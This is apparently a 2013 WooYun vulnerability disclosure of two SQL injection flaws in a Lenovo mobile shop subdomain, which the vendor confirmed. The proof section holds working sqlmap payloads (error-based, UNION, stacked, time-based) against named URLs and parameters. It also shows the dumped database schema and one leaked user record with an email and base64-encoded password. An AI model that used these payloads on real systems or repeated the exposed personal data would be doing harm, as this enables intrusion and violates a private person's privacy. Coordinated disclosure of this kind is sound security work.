当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035084

漏洞标题:联想安全问题三某分站两枚SQL注射(8198用户明文密码危险)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-23 16:00

修复时间:2013-10-07 16:01

公开时间:2013-10-07 16:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-23: 细节已通知厂商并且等待厂商处理中
2013-08-23: 厂商已经确认,细节仅向厂商公开
2013-09-02: 细节向核心白帽子及相关领域专家公开
2013-09-12: 细节向普通白帽子公开
2013-09-22: 细节向实习白帽子公开
2013-10-07: 细节向公众公开

简要描述:

无聊就跟着小胖子到处逛咯~~~

详细说明:

第一枚:

http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199


第二枚(需要登录状态):

http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586

漏洞证明:

第一枚:

---
Place: GET
Parameter: MbrID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MbrID=8199 AND 5966=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(10
3)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5966=5966) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: MbrID=-3869 UNION ALL SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)
+CHAR(113)+CHAR(81)+CHAR(98)+CHAR(79)+CHAR(84)+CHAR(85)+CHAR(98)+CHAR(89)+CHAR(6
7)+CHAR(98)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: MbrID=8199; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: MbrID=8199 WAITFOR DELAY '0:0:5'--
---
[13:32:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


第二枚:

---
Place: GET
Parameter: GdsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GdsID=A0900001586') AND 3859=3859 AND ('Twim'='Twim
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: GdsID=A0900001586') AND 3193=CONVERT(INT,(SELECT CHAR(113)+CHAR(116
)+CHAR(100)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (3193=3193) THEN CHAR(49) ELS
E CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(117)+CHAR(105)+CHAR(113))) AND ('MLFY'
='MLFY
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: GdsID=A0900001586'); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: GdsID=A0900001586') WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


当前库

s1.jpg



Database: lmshop
[89 tables]
+--------------------------+
| EssCarDtl |
| EssCarMst |
| EssCmpRegiForm |
| EssFavorites |
| EssGoods |
| EssGoodsColor |
| EssGoodsPresent |
| EssGoodsPrice_Log |
| EssMember |
| EssOrder |
| EssSales |
| EssSalesGoods |
| EssSalesMail |
| EssVerifyCode |
| JB_QuickLogin |
| MailBasSet |
| MailSet |
| MailTemplate |
| MailToDtl |
| MailToGrp |
| MstCode |
| MstCsErr |
| MstCsLog |
| MstCsMenu |
| MstCsUser |
| MstMenu |
| MstMessage |
| MstRole |
| MstRoleMenu |
| MstRoleUser |
| MstUser |
| PmtActivities |
| PmtAttach |
| PmtAttendance |
| PmtFee |
| PmtGoods |
| PmtImg |
| PmtImgSize |
| PmtOrder |
| PmtOrderWithDraw |
| PmtPromoter |
| PmtQA |
| PmtSettle |
| PmtSettleDtl |
| PmtSettleOrder |
| PmtSettleOrderTmp |
| PmtSettleSim |
| PmtSettleSimDtl |
| PmtVerifyCode |
| RECEIVE |
| SEND |
| SellBigOrder |
| SellCustomize |
| SellJoinEnterprise |
| SellJoinPerson |
| ShopCard |
| SmsBasSet |
| SmsClass |
| SmsDueSend |
| SmsDueSendRec |
| SmsNormalIF |
| SmsNormalIFCC111021 |
| SmsNormalIfRec |
| SmsReceive |
| SmsReceiveType |
| SmsSend |
| SmsSend100601 |
| SmsSend100602 |
| SmsSendRec |
| SmsSysSet |
| SmsTempIF |
| SmsTempIfRec |
| SmsTemplate |
| SmsUserRight |
| SmsWhiteBlackBill |
| TrnFeedback |
| TrnNews |
| V_EssGoodsPrice |
| V_GetPayTypeByDistrictID |
| V_OrderGoodsType |
| V_PmtFee |
| V_UserMenu |
| ZSmsNormalIF100601 |
| ZSmsNormalIF110916 |
| ZSmsNormalIF111018 |
| bakUp_LMmbrid |
| dtproperties |
| pangolin_test_table |
| sms.SmsNormalIFCC |
+--------------------------+


用户表里有啥字段

Database: lmshop
Table: EssMember
[12 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| Email | varchar |
| IsValid | nvarchar |
| MbrID | bigint |
| MbrName | varchar |
| Password | nvarchar |
| Phone | nvarchar |
| RegDate | datetime |
| RegID | nvarchar |
| SalesCode | varchar |
| SalesID | bigint |
| UpdDate | datetime |
| UpdID | nvarchar |
+-----------+----------+


看看多少数据

Database: lmshop
+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.EssMember | 8198 |
+---------------+---------+


然后跑了条用户数据,居然是base64有木有!!!这和明文有什么区别!!!

[13:53:00] [INFO] retrieved: lihe@cmbchina.com
[13:53:00] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:02] [INFO] retrieved: 1
[13:53:02] [INFO] retrieved: lihe
[13:53:02] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:03] [INFO] retrieved: 1
[13:53:03] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:04] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==

修复方案:

过滤什么的

版权声明:转载请注明来源 VIP@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-23 16:30

厂商回复:

感谢VIP同学对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无